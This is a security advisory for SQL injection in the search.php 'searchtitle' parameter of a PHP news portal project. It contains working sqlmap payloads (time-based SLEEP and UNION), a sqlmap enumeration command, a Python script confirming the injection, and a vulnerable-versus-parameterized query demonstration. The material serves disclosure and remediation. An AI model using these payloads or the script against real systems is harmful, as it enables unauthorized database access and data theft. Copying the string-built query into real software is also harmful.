Projectworlds Best Online News Portal Project V1.0 /search.php SQL Injection

by ADMIN

Introduction

This article describes a critical SQL injection vulnerability in the '/search.php' file of the 'Best Online News Portal' project (V1.0). The value of the POST parameter 'searchtitle' is placed directly into a SQL query without validation or parameterization, so an attacker who controls that value can change the logic of the query. The consequences are unauthorized database access, disclosure of sensitive data, data tampering and service interruption; depending on the privileges of the database account and the server configuration, it can also be a step toward wider compromise of the host.

Affected Product and Vendor

The affected product is the 'Best online news portal project in php', distributed from https://www.sourcecodester.com/php/16067/best-online-news-portal-project-php-free-download.html. The vulnerable file is '/search.php' and the affected version is V1.0.

Vulnerability Details

The root cause is that the 'searchtitle' parameter is inserted into the SQL statement as raw text rather than passed through a prepared statement, and no validation stands in the way. An attacker who controls the parameter can therefore close the string literal the value sits in and append their own conditions, UNION clauses or time-delaying subqueries. This allows reading data the search was never meant to return and, if the database account has write privileges, modifying or deleting data.

Impact

The impact of this vulnerability is severe, as it can lead to:

  • Unauthorized database access
  • Sensitive data leakage
  • Data tampering (where the database account has write privileges)
  • Further compromise of the host, depending on database privileges and server configuration
  • Service interruption

Description

During the security review of "Best online news portal System", a critical SQL injection vulnerability was discovered in the '/search.php' file. This vulnerability stems from insufficient user input validation of the 'searchtitle' parameter, allowing attackers to inject malicious SQL queries.

Exploitation

To exploit this vulnerability, an attacker submits a request to '/search.php' with a crafted 'searchtitle' value. The request can be captured from the search form and replayed with a tool like Burp Suite, or crafted by hand.

Proof of Concept

The following request, captured from the application's search form, is the baseline for the proof of concept. Its body is a benign search term; the payloads listed below are substituted for the value of 'searchtitle'. Saved to a file, it is also the input for the sqlmap run described later.

POST /101news/101news/search.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:138.0) Gecko/20100101 Firefox/138.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 15
Origin: http://localhost
Connection: close
Referer: http://localhost/101news/101news/news-details.php?nid=5
Cookie: PHPSESSID=r3bt76ge3sjka91e1v4nogtgkm
Upgrade-Insecure-Requests: 1
Priority: u=0, i

searchtitle=111

Vulnerability Type

sqlmap confirmed two injection techniques against the parameter: time-based blind (MySQL SLEEP()) and UNION query. The successful 8-column UNION shows that the underlying SELECT returns eight columns and that at least one of them is rendered in the response, so data can be read straight out of the page instead of one bit at a time through timing.

Vulnerability Payload

The following are the payloads reported by sqlmap for the 'searchtitle' parameter:

---
Parameter: searchtitle (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: searchtitle=111' AND (SELECT 9902 FROM (SELECT(SLEEP(5)))MaAl) AND 'fKDn'='fKDn

    Type: UNION query
    Title: Generic UNION query (NULL) - 8 columns
    Payload: searchtitle=111' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71766b7171,0x576454474f687361594b564c76664e62796848584e504373525072666c5746546a59714250777262,0x7171716b71)-- -
---
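The time-based payload above can be confirmed by hand before handing the request to sqlmap, which is useful when a finding must be re-verified without the tool's noise. The script below is an added example and is not code from the original report or from the project. It takes the endpoint, the parameter name and the SLEEP() payload template from the advisory; the baseline value "111", the 5-second delay, the sample count and the timing tolerance are assumptions. It alternates benign and injected requests and compares the medians, so a single slow round trip does not produce a false positive.

```python
"""Manual confirmation of the time-based blind SQL injection in search.php.

Added example, not code from the original report or the project. Endpoint,
parameter and payload template come from the advisory; the baseline value,
delay, sample count and tolerance are assumptions.
"""
import statistics
import time
import urllib.error
import urllib.parse
import urllib.request

TARGET = "http://localhost/101news/101news/search.php"  # from the PoC request
PARAM = "searchtitle"


def time_based_payload(base_value: str, delay: int) -> str:
    """Build the MySQL SLEEP() payload sqlmap reported, for any delay.

    The value closes the original string literal, ANDs in a subquery that
    sleeps, then re-opens a literal so the remainder of the original query
    still parses.  With delay=5 this reproduces the advisory's payload.
    """
    return (f"{base_value}' AND (SELECT 9902 FROM (SELECT(SLEEP({delay})))MaAl)"
            f" AND 'fKDn'='fKDn")


def post_timed(value: str, timeout: float = 30.0) -> float:
    """POST one searchtitle value and return the elapsed seconds.

    A 4xx/5xx response is still timed: a database error page arrives as fast
    as a normal page, and the delay is what matters here.
    """
    body = urllib.parse.urlencode({PARAM: value}).encode()
    req = urllib.request.Request(
        TARGET, data=body,
        headers={"Content-Type": "application/x-www-form-urlencoded"})
    start = time.monotonic()
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            resp.read()
    except urllib.error.HTTPError as err:
        err.read()
    return time.monotonic() - start


def confirmed(baseline: list[float], injected: list[float],
              delay: float, tolerance: float = 0.5) -> bool:
    """True if injected requests were slower by roughly `delay` seconds.

    Medians resist one slow network round trip; the tolerance (an assumed
    value, widen it on a noisy link) absorbs normal jitter.
    """
    gap = statistics.median(injected) - statistics.median(baseline)
    return gap >= delay - tolerance


def run(base_value: str = "111", delay: int = 5, samples: int = 3) -> bool:
    """Alternate benign and injected requests and report the verdict."""
    baseline, injected = [], []
    payload = time_based_payload(base_value, delay)
    for _ in range(samples):
        baseline.append(post_timed(base_value))
        injected.append(post_timed(payload))
    verdict = confirmed(baseline, injected, delay)
    print(f"baseline median {statistics.median(baseline):.2f}s, "
          f"injected median {statistics.median(injected):.2f}s -> "
          f"{'INJECTABLE' if verdict else 'not confirmed'}")
    return verdict


if __name__ == "__main__":
    run()
```

Run it against a local copy of the application only. Interleaving the benign and injected requests, rather than sending three of each in a row, keeps a load spike on the server from being mistaken for the SLEEP() delay.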

Testing and Running with sqlmap Tool

The captured request above was saved as a.txt and passed to sqlmap, which confirmed the injection and enumerated the databases visible to the application's account:

python sqlmap.py -r a.txt --random-agent --dbs

With -r, sqlmap takes the URL, headers, cookie and body from the file; --random-agent replaces the recorded User-Agent; --dbs lists the databases. Because the saved body carries only one parameter, 'searchtitle' is the parameter tested; -p searchtitle can be added to make that explicit.

Conclusion

In conclusion, version V1.0 of the 'Best online news portal project in php' contains a critical SQL injection vulnerability in '/search.php'. It can be exploited without special tooling to read data from the database and, depending on privileges, to modify or delete it. Because the input reaches the query as raw SQL text, the fix is to rewrite the query as a prepared statement; filtering the input is not a substitute. It is essential to patch this vulnerability as soon as possible to ensure system security and protect data integrity.

Recommendations

To prevent this vulnerability, we recommend the following:

  • Use prepared statements or parameterized queries (in PHP, mysqli or PDO with bound parameters) for every query that incorporates request data; this is the actual fix
  • Validate user input (length, allowed characters) as defense in depth, not as the primary control
  • Run the application with a database account limited to the privileges the site needs, so a successful injection cannot reach other databases or write where it should not
  • Use a web application firewall (WAF) to detect and block common SQL injection patterns, keeping in mind that WAF rules can be bypassed and do not remove the flaw
  • Regularly update and patch software to ensure the latest security fixes are applied
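To make the first two recommendations concrete, the block below puts a string-built search query next to its parameterized replacement and runs both against the two payload shapes the advisory reports: a value that breaks out of the quoted literal, and a UNION that reads schema data. This is an added example, not code from the project. The project is written in PHP against MySQL; sqlite3 is used here so the demonstration runs offline, and the posts table and its rows are constructed for the example. The PHP equivalent of safe_search is a mysqli or PDO prepared statement with the search term bound as a parameter.

```python
"""Vulnerable string-built query beside its parameterized replacement.

Added example, not code from the project.  sqlite3 stands in for MySQL so
the demonstration runs offline; the table, rows and payloads are constructed.
"""
import sqlite3

# Constructed sample data: a posts table the search is imagined to query.
POSTS = [
    (1, "Council approves budget", "Local news body"),
    (2, "Stadium opens", "Sports body"),
    (3, "Election results", "Politics body"),
]


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE posts (id INTEGER, title TEXT, body TEXT)")
    conn.executemany("INSERT INTO posts VALUES (?, ?, ?)", POSTS)
    return conn


def vulnerable_search(conn: sqlite3.Connection, term: str) -> list[tuple]:
    """Mirrors the flaw: the request value is spliced into the SQL text."""
    sql = f"SELECT id, title, body FROM posts WHERE title LIKE '%{term}%'"
    return conn.execute(sql).fetchall()


def safe_search(conn: sqlite3.Connection, term: str) -> list[tuple]:
    """The fix: a placeholder carries the value; the SQL text never changes.

    The wildcard is added to the bound value, not to the statement, so a
    quote inside the term is just a character to match.
    """
    sql = "SELECT id, title, body FROM posts WHERE title LIKE ?"
    return conn.execute(sql, (f"%{term}%",)).fetchall()


# Closes the literal and re-opens it so the trailing %' of the original query
# still parses, the same trick the advisory's payload uses with 'fKDn'='fKDn.
TAUTOLOGY = "zzz' OR '%'='"

# Three columns to match the SELECT above.  sqlite_master plays the role of
# MySQL's information_schema; the literal is re-closed instead of using the
# MySQL-style '-- -' comment seen in the sqlmap UNION payload.
UNION = "zzz' UNION ALL SELECT NULL, name, sql FROM sqlite_master WHERE '%'='"


def demo() -> dict:
    """Run both payloads through both implementations and collect results."""
    conn = make_db()
    return {
        "vuln_tautology": len(vulnerable_search(conn, TAUTOLOGY)),  # every row
        "vuln_union": vulnerable_search(conn, UNION),               # schema leak
        "safe_tautology": len(safe_search(conn, TAUTOLOGY)),        # no match
        "safe_union": len(safe_search(conn, UNION)),                # no match
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

The parameterized version does not become safe because the payloads are filtered; it is safe because the database receives a fixed statement and a separate value, so there is no way for the value to be parsed as SQL. That is why the prepared statement, not a WAF rule or a blacklist of quote characters, is the fix for search.php.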
